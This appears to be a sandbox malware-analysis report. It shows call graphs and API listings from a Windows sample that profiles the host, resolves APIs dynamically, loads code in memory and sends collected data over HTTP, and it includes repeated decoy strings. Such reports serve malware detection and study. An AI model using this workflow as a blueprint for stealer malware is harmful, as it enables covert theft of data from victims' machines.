14756->14757 14758 931ff8 14757->14758 15382 937d80 GetSystemPowerStatus 14758->15382 14761 93a9b0 4 API calls 14762 932018 14761->14762 14763 93a8a0 lstrcpy 14762->14763 14764 
932021 14763->14764 14765 93a9b0 4 API calls 14764->14765 14766 932040 14765->14766 14767 93a8a0 lstrcpy 14766->14767 14768 932049 14767->14768 14769 93a9b0 4 API calls 14768->14769 14770 93206a 14769->14770 14771 93a8a0 lstrcpy 14770->14771 14772 932073 14771->14772 14773 93207e GetCurrentProcessId 14772->14773 15384 939470 OpenProcess 14773->15384 14776 93a920 3 API calls 14777 9320a4 14776->14777 14778 93a8a0 lstrcpy 14777->14778 14779 9320ad 14778->14779 14780 93a9b0 4 API calls 14779->14780 14781 9320d7 14780->14781 14782 93a8a0 lstrcpy 14781->14782 14783 9320e0 14782->14783 14784 93a9b0 4 API calls 14783->14784 14785 932100 14784->14785 14786 93a8a0 lstrcpy 14785->14786 14787 932109 14786->14787 15389 937e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14787->15389 14790 93a9b0 4 API calls 14791 932129 14790->14791 14792 93a8a0 lstrcpy 14791->14792 14793 932132 14792->14793 14794 93a9b0 4 API calls 14793->14794 14795 932151 14794->14795 14796 93a8a0 lstrcpy 14795->14796 14797 93215a 14796->14797 14798 93a9b0 4 API calls 14797->14798 14799 93217b 14798->14799 14800 93a8a0 lstrcpy 14799->14800 14801 932184 14800->14801 15393 937f60 14801->15393 14804 93a9b0 4 API calls 14805 9321a4 14804->14805 14806 93a8a0 lstrcpy 14805->14806 14807 9321ad 14806->14807 14808 93a9b0 4 API calls 14807->14808 14809 9321cc 14808->14809 14810 93a8a0 lstrcpy 14809->14810 14811 9321d5 14810->14811 14812 93a9b0 4 API calls 14811->14812 14813 9321f6 14812->14813 14814 93a8a0 lstrcpy 14813->14814 14815 9321ff 14814->14815 15406 937ed0 GetSystemInfo wsprintfA 14815->15406 14818 93a9b0 4 API calls 14819 93221f 14818->14819 14820 93a8a0 lstrcpy 14819->14820 14821 932228 14820->14821 14822 93a9b0 4 API calls 14821->14822 14823 932247 14822->14823 14824 93a8a0 lstrcpy 14823->14824 14825 932250 14824->14825 14826 93a9b0 4 API calls 14825->14826 14827 932270 14826->14827 14828 93a8a0 lstrcpy 14827->14828 14829 932279 14828->14829 15408 938100 GetProcessHeap RtlAllocateHeap 14829->15408 14832 
93a9b0 4 API calls 14833 932299 14832->14833 14834 93a8a0 lstrcpy 14833->14834 14835 9322a2 14834->14835 14836 93a9b0 4 API calls 14835->14836 14837 9322c1 14836->14837 14838 93a8a0 lstrcpy 14837->14838 14839 9322ca 14838->14839 14840 93a9b0 4 API calls 14839->14840 14841 9322eb 14840->14841 14842 93a8a0 lstrcpy 14841->14842 14843 9322f4 14842->14843 15414 9387c0 14843->15414 14846 93a920 3 API calls 14847 93231e 14846->14847 14848 93a8a0 lstrcpy 14847->14848 14849 932327 14848->14849 14850 93a9b0 4 API calls 14849->14850 14851 932351 14850->14851 14852 93a8a0 lstrcpy 14851->14852 14853 93235a 14852->14853 14854 93a9b0 4 API calls 14853->14854 14855 93237a 14854->14855 14856 93a8a0 lstrcpy 14855->14856 14857 932383 14856->14857 14858 93a9b0 4 API calls 14857->14858 14859 9323a2 14858->14859 14860 93a8a0 lstrcpy 14859->14860 14861 9323ab 14860->14861 15419 9381f0 14861->15419 14863 9323c2 14864 93a920 3 API calls 14863->14864 14865 9323d5 14864->14865 14866 93a8a0 lstrcpy 14865->14866 14867 9323de 14866->14867 14868 93a9b0 4 API calls 14867->14868 14869 93240a 14868->14869 14870 93a8a0 lstrcpy 14869->14870 14871 932413 14870->14871 14872 93a9b0 4 API calls 14871->14872 14873 932432 14872->14873 14874 93a8a0 lstrcpy 14873->14874 14875 93243b 14874->14875 14876 93a9b0 4 API calls 14875->14876 14877 93245c 14876->14877 14878 93a8a0 lstrcpy 14877->14878 14879 932465 14878->14879 14880 93a9b0 4 API calls 14879->14880 14881 932484 14880->14881 14882 93a8a0 lstrcpy 14881->14882 14883 93248d 14882->14883 14884 93a9b0 4 API calls 14883->14884 14885 9324ae 14884->14885 14886 93a8a0 lstrcpy 14885->14886 14887 9324b7 14886->14887 15427 938320 14887->15427 14889 9324d3 14890 93a920 3 API calls 14889->14890 14891 9324e6 14890->14891 14892 93a8a0 lstrcpy 14891->14892 14893 9324ef 14892->14893 14894 93a9b0 4 API calls 14893->14894 14895 932519 14894->14895 14896 93a8a0 lstrcpy 14895->14896 14897 932522 14896->14897 14898 93a9b0 4 API calls 14897->14898 14899 932543 14898->14899 
14900 93a8a0 lstrcpy 14899->14900 14901 93254c 14900->14901 14902 938320 17 API calls 14901->14902 14903 932568 14902->14903 14904 93a920 3 API calls 14903->14904 14905 93257b 14904->14905 14906 93a8a0 lstrcpy 14905->14906 14907 932584 14906->14907 14908 93a9b0 4 API calls 14907->14908 14909 9325ae 14908->14909 14910 93a8a0 lstrcpy 14909->14910 14911 9325b7 14910->14911 14912 93a9b0 4 API calls 14911->14912 14913 9325d6 14912->14913 14914 93a8a0 lstrcpy 14913->14914 14915 9325df 14914->14915 14916 93a9b0 4 API calls 14915->14916 14917 932600 14916->14917 14918 93a8a0 lstrcpy 14917->14918 14919 932609 14918->14919 15463 938680 14919->15463 14921 932620 14922 93a920 3 API calls 14921->14922 14923 932633 14922->14923 14924 93a8a0 lstrcpy 14923->14924 14925 93263c 14924->14925 14926 93265a lstrlen 14925->14926 14927 93266a 14926->14927 14928 93a740 lstrcpy 14927->14928 14929 93267c 14928->14929 14930 921590 lstrcpy 14929->14930 14931 93268d 14930->14931 15473 935190 14931->15473 14933 932699 14933->13365 15661 93aad0 14934->15661 14936 925009 InternetOpenUrlA 14940 925021 14936->14940 14937 9250a0 InternetCloseHandle InternetCloseHandle 14939 9250ec 14937->14939 14938 92502a InternetReadFile 14938->14940 14939->13369 14940->14937 14940->14938 15662 9298d0 14941->15662 14943 930759 14944 930a38 14943->14944 14946 93077d 14943->14946 14945 921590 lstrcpy 14944->14945 14947 930a49 14945->14947 14948 930799 StrCmpCA 14946->14948 15838 930250 14947->15838 14950 930843 14948->14950 14951 9307a8 14948->14951 14954 930865 StrCmpCA 14950->14954 14953 93a7a0 lstrcpy 14951->14953 14955 9307c3 14953->14955 14957 930874 14954->14957 14993 93096b 14954->14993 14956 921590 lstrcpy 14955->14956 14958 93080c 14956->14958 14959 93a740 lstrcpy 14957->14959 14960 93a7a0 lstrcpy 14958->14960 14962 930881 14959->14962 14963 930823 14960->14963 14961 93099c StrCmpCA 14964 930a2d 14961->14964 14965 9309ab 14961->14965 14966 93a9b0 4 API calls 14962->14966 14967 93a7a0 lstrcpy 14963->14967 
14964->13373 14968 921590 lstrcpy 14965->14968 14969 9308ac 14966->14969 14971 93083e 14967->14971 14972 9309f4 14968->14972 14970 93a920 3 API calls 14969->14970 14973 9308b3 14970->14973 15665 92fb00 14971->15665 14975 93a7a0 lstrcpy 14972->14975 14977 93a9b0 4 API calls 14973->14977 14976 930a0d 14975->14976 14978 93a7a0 lstrcpy 14976->14978 14979 9308ba 14977->14979 14980 930a28 14978->14980 14981 93a8a0 lstrcpy 14979->14981 14993->14961 15313 93a7a0 lstrcpy 15312->15313 15314 921683 15313->15314 15315 93a7a0 lstrcpy 15314->15315 15316 921695 15315->15316 15317 93a7a0 lstrcpy 15316->15317 15318 9216a7 15317->15318 15319 93a7a0 lstrcpy 15318->15319 15320 9215a3 15319->15320 15320->14196 15322 9247c6 15321->15322 15323 924838 lstrlen 15322->15323 15347 93aad0 15323->15347 15325 924848 InternetCrackUrlA 15326 924867 15325->15326 15326->14273 15328 93a740 lstrcpy 15327->15328 15329 938b74 15328->15329 15330 93a740 lstrcpy 15329->15330 15331 938b82 GetSystemTime 15330->15331 15333 938b99 15331->15333 15332 93a7a0 lstrcpy 15334 938bfc 15332->15334 15333->15332 15334->14288 15336 93a931 15335->15336 15337 93a988 15336->15337 15339 93a968 lstrcpy lstrcat 15336->15339 15338 93a7a0 lstrcpy 15337->15338 15340 93a994 15338->15340 15339->15337 15340->14291 15341->14406 15343 924eee 15342->15343 15344 929af9 LocalAlloc 15342->15344 15343->14294 15343->14296 15344->15343 15345 929b14 CryptStringToBinaryA 15344->15345 15345->15343 15346 929b39 LocalFree 15345->15346 15346->15343 15347->15325 15348->14416 15349->14557 15350->14559 15351->14567 15480 9377a0 15352->15480 15355 9376c6 RegOpenKeyExA 15357 9376e7 RegQueryValueExA 15355->15357 15358 937704 RegCloseKey 15355->15358 15356 931c1e 15356->14649 15357->15358 15358->15356 15360 931c99 15359->15360 15360->14663 15362 931e09 15361->15362 15362->14705 15364 931e84 15363->15364 15365 937a9a wsprintfA 15363->15365 15364->14719 15365->15364 15367 931efe 15366->15367 15368 937b4d 15366->15368 15367->14733 15487 938d20 LocalAlloc 
CharToOemW 15368->15487 15371 93a740 lstrcpy 15370->15371 15372 937bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15371->15372 15381 937c25 15372->15381 15373 937c46 GetLocaleInfoA 15373->15381 15374 937d18 15375 937d28 15374->15375 15376 937d1e LocalFree 15374->15376 15378 93a7a0 lstrcpy 15375->15378 15376->15375 15377 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15377->15381 15380 937d37 15378->15380 15379 93a8a0 lstrcpy 15379->15381 15380->14746 15381->15373 15381->15374 15381->15377 15381->15379 15383 932008 15382->15383 15383->14761 15385 939493 GetModuleFileNameExA CloseHandle 15384->15385 15386 9394b5 15384->15386 15385->15386 15387 93a740 lstrcpy 15386->15387 15388 932091 15387->15388 15388->14776 15390 932119 15389->15390 15391 937e68 RegQueryValueExA 15389->15391 15390->14790 15392 937e8e RegCloseKey 15391->15392 15392->15390 15394 937fb9 GetLogicalProcessorInformationEx 15393->15394 15395 937fd8 GetLastError 15394->15395 15399 938029 15394->15399 15401 937fe3 15395->15401 15404 938022 15395->15404 15398 9389f0 2 API calls 15402 932194 15398->15402 15400 9389f0 2 API calls 15399->15400 15403 93807b 15400->15403 15401->15394 15401->15402 15488 9389f0 15401->15488 15491 938a10 GetProcessHeap RtlAllocateHeap 15401->15491 15402->14804 15403->15404 15405 938084 wsprintfA 15403->15405 15404->15398 15404->15402 15405->15402 15407 93220f 15406->15407 15407->14818 15409 9389b0 15408->15409 15410 93814d GlobalMemoryStatusEx 15409->15410 15413 938163 __aulldiv 15410->15413 15411 93819b wsprintfA 15412 932289 15411->15412 15412->14832 15413->15411 15415 9387fb GetProcessHeap RtlAllocateHeap wsprintfA 15414->15415 15417 93a740 lstrcpy 15415->15417 15418 93230b 15417->15418 15418->14846 15420 93a740 lstrcpy 15419->15420 15422 938229 15420->15422 15421 938263 15424 93a7a0 lstrcpy 15421->15424 15422->15421 15423 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15422->15423 15426 93a8a0 lstrcpy 15422->15426 15423->15422 15425 9382dc 15424->15425 15425->14863 15426->15422 
15428 93a740 lstrcpy 15427->15428 15429 93835c RegOpenKeyExA 15428->15429 15430 9383d0 15429->15430 15431 9383ae 15429->15431 15433 938613 RegCloseKey 15430->15433 15434 9383f8 RegEnumKeyExA 15430->15434 15432 93a7a0 lstrcpy 15431->15432 15443 9383bd 15432->15443 15435 93a7a0 lstrcpy 15433->15435 15436 93843f wsprintfA RegOpenKeyExA 15434->15436 15437 93860e 15434->15437 15435->15443 15438 9384c1 RegQueryValueExA 15436->15438 15439 938485 RegCloseKey RegCloseKey 15436->15439 15437->15433 15441 938601 RegCloseKey 15438->15441 15442 9384fa lstrlen 15438->15442 15440 93a7a0 lstrcpy 15439->15440 15440->15443 15441->15437 15442->15441 15444 938510 15442->15444 15443->14889 15445 93a9b0 4 API calls 15444->15445 15446 938527 15445->15446 15447 93a8a0 lstrcpy 15446->15447 15448 938533 15447->15448 15449 93a9b0 4 API calls 15448->15449 15450 938557 15449->15450 15451 93a8a0 lstrcpy 15450->15451 15452 938563 15451->15452 15453 93856e RegQueryValueExA 15452->15453 15453->15441 15454 9385a3 15453->15454 15455 93a9b0 4 API calls 15454->15455 15456 9385ba 15455->15456 15457 93a8a0 lstrcpy 15456->15457 15458 9385c6 15457->15458 15459 93a9b0 4 API calls 15458->15459 15460 9385ea 15459->15460 15461 93a8a0 lstrcpy 15460->15461 15462 9385f6 15461->15462 15462->15441 15464 93a740 lstrcpy 15463->15464 15465 9386bc CreateToolhelp32Snapshot Process32First 15464->15465 15466 9386e8 Process32Next 15465->15466 15467 93875d CloseHandle 15465->15467 15466->15467 15470 9386fd 15466->15470 15468 93a7a0 lstrcpy 15467->15468 15471 938776 15468->15471 15469 93a9b0 lstrcpy lstrlen lstrcpy lstrcat 15469->15470 15470->15466 15470->15469 15472 93a8a0 lstrcpy 15470->15472 15471->14921 15472->15470 15474 93a7a0 lstrcpy 15473->15474 15475 9351b5 15474->15475 15476 921590 lstrcpy 15475->15476 15477 9351c6 15476->15477 15492 925100 15477->15492 15479 9351cf 15479->14933 15483 937720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15480->15483 15482 9376b9 15482->15355 15482->15356 15484 937780 RegCloseKey 
15483->15484 15485 937765 RegQueryValueExA 15483->15485 15486 937793 15484->15486 15485->15484 15486->15482 15487->15367 15489 9389f9 GetProcessHeap HeapFree 15488->15489 15490 938a0c 15488->15490 15489->15490 15490->15401 15491->15401 15493 93a7a0 lstrcpy 15492->15493 15494 925119 15493->15494 15495 9247b0 2 API calls 15494->15495 15496 925125 15495->15496 15652 938ea0 15496->15652 15498 925184 15499 925192 lstrlen 15498->15499 15500 9251a5 15499->15500 15501 938ea0 4 API calls 15500->15501 15502 9251b6 15501->15502 15503 93a740 lstrcpy 15502->15503 15504 9251c9 15503->15504 15505 93a740 lstrcpy 15504->15505 15506 9251d6 15505->15506 15507 93a740 lstrcpy 15506->15507 15508 9251e3 15507->15508 15509 93a740 lstrcpy 15508->15509 15510 9251f0 15509->15510 15511 93a740 lstrcpy 15510->15511 15512 9251fd InternetOpenA StrCmpCA 15511->15512 15513 92522f 15512->15513 15514 9258c4 InternetCloseHandle 15513->15514 15515 938b60 3 API calls 15513->15515 15521 9258d9 codecvt 15514->15521 15516 92524e 15515->15516 15517 93a920 3 API calls 15516->15517 15518 925261 15517->15518 15519 93a8a0 lstrcpy 15518->15519 15520 92526a 15519->15520 15522 93a9b0 4 API calls 15520->15522 15524 93a7a0 lstrcpy 15521->15524 15523 9252ab 15522->15523 15525 93a920 3 API calls 15523->15525 15533 925913 15524->15533 15526 9252b2 15525->15526 15527 93a9b0 4 API calls 15526->15527 15528 9252b9 15527->15528 15529 93a8a0 lstrcpy 15528->15529 15530 9252c2 15529->15530 15531 93a9b0 4 API calls 15530->15531 15532 925303 15531->15532 15534 93a920 3 API calls 15532->15534 15533->15479 15535 92530a 15534->15535 15536 93a8a0 lstrcpy 15535->15536 15537 925313 15536->15537 15538 925329 InternetConnectA 15537->15538 15538->15514 15539 925359 HttpOpenRequestA 15538->15539 15541 9258b7 InternetCloseHandle 15539->15541 15542 9253b7 15539->15542 15541->15514 15543 93a9b0 4 API calls 15542->15543 15544 9253cb 15543->15544 15545 93a8a0 lstrcpy 15544->15545 15546 9253d4 15545->15546 15547 93a920 3 API calls 15546->15547 
15548 9253f2 15547->15548 15549 93a8a0 lstrcpy 15548->15549 15550 9253fb 15549->15550 15551 93a9b0 4 API calls 15550->15551 15552 92541a 15551->15552 15553 93a8a0 lstrcpy 15552->15553 15554 925423 15553->15554 15555 93a9b0 4 API calls 15554->15555 15556 925444 15555->15556 15557 93a8a0 lstrcpy 15556->15557 15558 92544d 15557->15558 15559 93a9b0 4 API calls 15558->15559 15560 92546e 15559->15560 15653 938ead CryptBinaryToStringA 15652->15653 15657 938ea9 15652->15657 15654 938ece GetProcessHeap RtlAllocateHeap 15653->15654 15653->15657 15655 938ef4 codecvt 15654->15655 15654->15657 15656 938f05 CryptBinaryToStringA 15655->15656 15656->15657 15657->15498 15661->14936 15904 929880 15662->15904 15664 9298e1 15664->14943 15666 93a740 lstrcpy 15665->15666 15667 92fb16 15666->15667 15839 93a740 lstrcpy 15838->15839 15840 930266 15839->15840 15841 938de0 2 API calls 15840->15841 15842 93027b 15841->15842 15843 93a920 3 API calls 15842->15843 15844 93028b 15843->15844 15845 93a8a0 lstrcpy 15844->15845 15846 930294 15845->15846 15847 93a9b0 4 API calls 15846->15847 15905 92988e 15904->15905 15908 926fb0 15905->15908 15907 9298ad codecvt 15907->15664 15911 926d40 15908->15911 15912 926d63 15911->15912 15926 926d59 15911->15926 15927 926530 15912->15927 15916 926dbe 15916->15926 15937 9269b0 15916->15937 15918 926e2a 15919 926ee6 VirtualFree 15918->15919 15921 926ef7 15918->15921 15918->15926 15919->15921 15920 926f41 15922 9389f0 2 API calls 15920->15922 15920->15926 15921->15920 15923 926f26 FreeLibrary 15921->15923 15924 926f38 15921->15924 15922->15926 15923->15921 15925 9389f0 2 API calls 15924->15925 15925->15920 15926->15907 15928 926542 15927->15928 15930 926549 15928->15930 15947 938a10 GetProcessHeap RtlAllocateHeap 15928->15947 15930->15926 15931 926660 15930->15931 15936 92668f VirtualAlloc 15931->15936 15933 926730 15934 926743 VirtualAlloc 15933->15934 15935 92673c 15933->15935 15934->15935 15935->15916 15936->15933 15936->15935 15938 9269d5 15937->15938 15939 
9269c9 15937->15939 15938->15918 15939->15938 15940 926a09 LoadLibraryA 15939->15940 15940->15938 15941 926a32 15940->15941 15944 926ae0 15941->15944 15948 938a10 GetProcessHeap RtlAllocateHeap 15941->15948 15943 926ba8 GetProcAddress 15943->15938 15943->15944 15944->15938 15944->15943 15945 9389f0 2 API calls 15945->15944 15946 926a8b 15946->15938 15946->15945 15947->15930 15948->15946

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 939860-939874 call 939750 663 939a93-939af2 LoadLibraryA * 5 660->663 664 93987a-939a8e call 939780 GetProcAddress * 21 660->664 666 939af4-939b08 GetProcAddress 663->666 667 939b0d-939b14 663->667 664->663 666->667 668 939b46-939b4d 667->668 669 939b16-939b41 GetProcAddress * 2 667->669 671 939b68-939b6f 668->671 672 939b4f-939b63 GetProcAddress 668->672 669->668 673 939b71-939b84 GetProcAddress 671->673 674 939b89-939b90 671->674 672->671 673->674 675 939b92-939bbc GetProcAddress * 2 674->675 676 939bc1-939bc2 674->676 675->676
                  APIs
                  • GetProcAddress.KERNEL32(76F70000,010541F8), ref: 009398A1
                  • GetProcAddress.KERNEL32(76F70000,01054228), ref: 009398BA
                  • GetProcAddress.KERNEL32(76F70000,01054258), ref: 009398D2
                  • GetProcAddress.KERNEL32(76F70000,01054150), ref: 009398EA
                  • GetProcAddress.KERNEL32(76F70000,010540D8), ref: 00939903
                  • GetProcAddress.KERNEL32(76F70000,01058E10), ref: 0093991B
                  • GetProcAddress.KERNEL32(76F70000,01046260), ref: 00939933
                  • GetProcAddress.KERNEL32(76F70000,010461E0), ref: 0093994C
                  • GetProcAddress.KERNEL32(76F70000,01054198), ref: 00939964
                  • GetProcAddress.KERNEL32(76F70000,010540C0), ref: 0093997C
                  • GetProcAddress.KERNEL32(76F70000,01054168), ref: 00939995
                  • GetProcAddress.KERNEL32(76F70000,01054180), ref: 009399AD
                  • GetProcAddress.KERNEL32(76F70000,01046360), ref: 009399C5
                  • GetProcAddress.KERNEL32(76F70000,010541B0), ref: 009399DE
                  • GetProcAddress.KERNEL32(76F70000,01059228), ref: 009399F6
                  • GetProcAddress.KERNEL32(76F70000,01046460), ref: 00939A0E
                  • GetProcAddress.KERNEL32(76F70000,01059360), ref: 00939A27
                  • GetProcAddress.KERNEL32(76F70000,01059378), ref: 00939A3F
                  • GetProcAddress.KERNEL32(76F70000,01046400), ref: 00939A57
                  • GetProcAddress.KERNEL32(76F70000,01059240), ref: 00939A70
                  • GetProcAddress.KERNEL32(76F70000,01046520), ref: 00939A88
                  • LoadLibraryA.KERNEL32(01059210,?,00936A00), ref: 00939A9A
                  • LoadLibraryA.KERNEL32(01059258,?,00936A00), ref: 00939AAB
                  • LoadLibraryA.KERNEL32(010591B0,?,00936A00), ref: 00939ABD
                  • LoadLibraryA.KERNEL32(01059270,?,00936A00), ref: 00939ACF
                  • LoadLibraryA.KERNEL32(010591C8,?,00936A00), ref: 00939AE0
                  • GetProcAddress.KERNEL32(76DA0000,01059288), ref: 00939B02
                  • GetProcAddress.KERNEL32(75840000,010591E0), ref: 00939B23
                  • GetProcAddress.KERNEL32(75840000,010592A0), ref: 00939B3B
                  • GetProcAddress.KERNEL32(753A0000,01059330), ref: 00939B5D
                  • GetProcAddress.KERNEL32(77300000,01046500), ref: 00939B7E
                  • GetProcAddress.KERNEL32(774D0000,01058DB0), ref: 00939B9F
                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00939BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00939BAA
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
                  • Instruction ID: 9c4764b9235f323e7f3ea578ca8725097add8e93c36c325dc4ec05006c9d8627
                  • Opcode Fuzzy Hash: e43167228c2de61e1f43585264dccaaef8567aae87a66508368ad6d6ab87d2c2
                  • Instruction Fuzzy Hash: 52A13CB55012409FDB44EFA8EE98A6637F9F78C301704451AE609E32E4DEBDA841DF63

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 9245c0-924695 RtlAllocateHeap 781 9246a0-9246a6 764->781 782 92474f-9247a9 VirtualProtect 781->782 783 9246ac-92474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0092460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0092479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30 references to the same string): 009245C7, 009245D2, 009245DD, 009245E8, 009245F3, 00924617, 00924622, 0092462D, 00924638, 00924643, 00924657, 00924662, 0092466D, 00924678, 00924683, 009246AC, 009246B7, 009246C2, 009246CD, 009246D8, 00924713, 0092471E, 00924729, 00924734, 0092473F, 0092474F, 0092475A, 00924765, 00924770, 0092477B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated 30 times, '$'-separated in the report, one copy per xref listed above)
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 5b2a113903bf862b07eb7057bf0814963b68615684a9440ca80d4e7e3b9f614b
                  • Instruction ID: ee79abb0b0be138a5c0fd538c639270dba3a94191422892524fa7f83b886e76b
                  • Opcode Fuzzy Hash: 5b2a113903bf862b07eb7057bf0814963b68615684a9440ca80d4e7e3b9f614b
                  • Instruction Fuzzy Hash: 994136607D6E047BC638BBE5A86EEFF77565FD6B08F815040A8485228BCAF0A50C453A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 924880-924942 call 93a7a0 call 9247b0 call 93a740 * 5 InternetOpenA StrCmpCA 816 924944 801->816 817 92494b-92494f 801->817 816->817 818 924955-924acd call 938b60 call 93a920 call 93a8a0 call 93a800 * 2 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a920 call 93a8a0 call 93a800 * 2 InternetConnectA 817->818 819 924ecb-924ef3 InternetCloseHandle call 93aad0 call 929ac0 817->819 818->819 905 924ad3-924ad7 818->905 829 924f32-924fa2 call 938990 * 2 call 93a7a0 call 93a800 * 8 819->829 830 924ef5-924f2d call 93a820 call 93a9b0 call 93a8a0 call 93a800 819->830 830->829 906 924ae5 905->906 907 924ad9-924ae3 905->907 908 924aef-924b22 HttpOpenRequestA 906->908 907->908 909 924b28-924e28 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a9b0 call 93a8a0 call 93a800 call 93a920 call 93a8a0 call 93a800 call 93a740 call 93a920 * 2 call 93a8a0 call 93a800 * 2 call 93aad0 lstrlen call 93aad0 * 2 lstrlen call 93aad0 HttpSendRequestA 908->909 910 924ebe-924ec5 InternetCloseHandle 908->910 1021 924e32-924e5c InternetReadFile 909->1021 910->819 1022 924e67-924eb9 InternetCloseHandle call 93a800 1021->1022 1023 924e5e-924e65 1021->1023 1022->910 1023->1022 1024 924e69-924ea7 call 93a9b0 call 93a8a0 call 93a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00924915
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 0092493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00940DDB,00000000,?,?,00000000,?,",00000000,?,0105E6F0), ref: 00924DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00924E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00924E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00924E49
                  • InternetCloseHandle.WININET(00000000), ref: 00924EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00924EC5
